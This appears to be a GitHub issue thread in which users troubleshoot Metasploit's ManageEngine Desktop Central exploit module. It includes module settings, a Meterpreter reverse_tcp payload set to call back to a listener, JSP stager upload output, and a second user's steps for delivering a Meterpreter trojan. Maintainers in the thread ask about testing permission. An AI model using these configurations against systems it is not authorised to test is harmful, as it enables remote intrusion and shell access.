Closed korsangazi closed 6 years ago
Are you sure it's vulnerable?
i think so yes, I dont know how to use payload.
Do you have permission to test on the host?
Have you tried the check
method?
Is the remote host running Windows?
Does the remote host allow egress traffic to port 4444/tcp?
I cant access Remote host, The remote host using windows. I changed the port, still doesnt working
If you have permission, you should ensure connectivity on the reverse path (routing and socket access to the lhost lport from the target). If you don't, stop doing what you're doing.
@sempervictus I tested with generic payload handler. it is working but i cannot run exploit.
Are you testing a system on the internet or on an internal LAN? You're currently binding your handler to an internal (10.x.x.x) IP. Just to make sure that this is not the problem.
msf5 exploit(multi/handler) > exploit
[] Started reverse TCP handler on 10.2.3.67:4444 [] 198.199.x.xxx - Command shell session 2 closed. Reason: Died from EOFError [] Command shell session 2 opened (127.0.0.1 -> 198.199.x.x:51935) at 2018-04-08 19:11:19 +0000 [] 198.199.x.xxx - Command shell session 3 closed. Reason: Died from EOFError [*] Command shell session 3 opened (127.0.0.1 -> 198.199.x.x:51938) at 2018-04-08 19:11:21 +0000
@kevin-ott yes. my output
If the session is starting, you've got socket and routing. Is the digital ocean drop @ 198.199.98.246 yours? If so, I'd try to generate the payload manually and run it from the drop, to see that the handler and payload can keep comms. What I see as interesting is that the lhost on your session is localhost, should be that 10.x address.
Exploit completed, but no session was created.??
pls i have been trying to get it right but its not working, any idea on what to do?
pls i have been trying to get it right but its not working, any idea on what to do?
There is not enough information to offer any assistance. You can set HttpTrace true
to see debug output which may help. This issue is closed.
i am trying to hack my virtual window in the same network
for the trojan lhost=10.0.2.6 lport=2525
msfconsole =use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp set lhost=10.0.2.6 lport=2525 set target=0
after downloading the trojan in virtual window exploit , exploit -j -z , run
exploit completed but no session was created.. what can i do
Steps to reproduce
Issue picture: https://prnt.sc/j2jar4
Module options (exploit/windows/http/manageengine_connectionid_write):
Name Current Setting Required Description
Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST xx.xx.x.x yes The target address RPORT 8020 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes The base path for ManageEngine Desktop Central VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 10.2.3.67 yes The listen address LPORT 4444 yes The listen port
Exploit target:
Id Name
0 ManageEngine Desktop Central 9 on Windows
msf5 exploit(windows/http/manageengine_connectionid_write) > exploit
[] Started reverse TCP handler on 10.2.3.67:4444 [] Creating JSP stager [] Uploading JSP stager gHZKe.jsp... [] Executing stager... [!] This exploit may require manual cleanup of '../webapps/DesktopCentral/jspf/gHZKe.jsp' on the target [*] Exploit completed, but no session was created.
Metasploit version
Framework: 5.0.0-dev-a473dd0 Console : 5.0.0-dev-a473dd0
OS
Ubuntu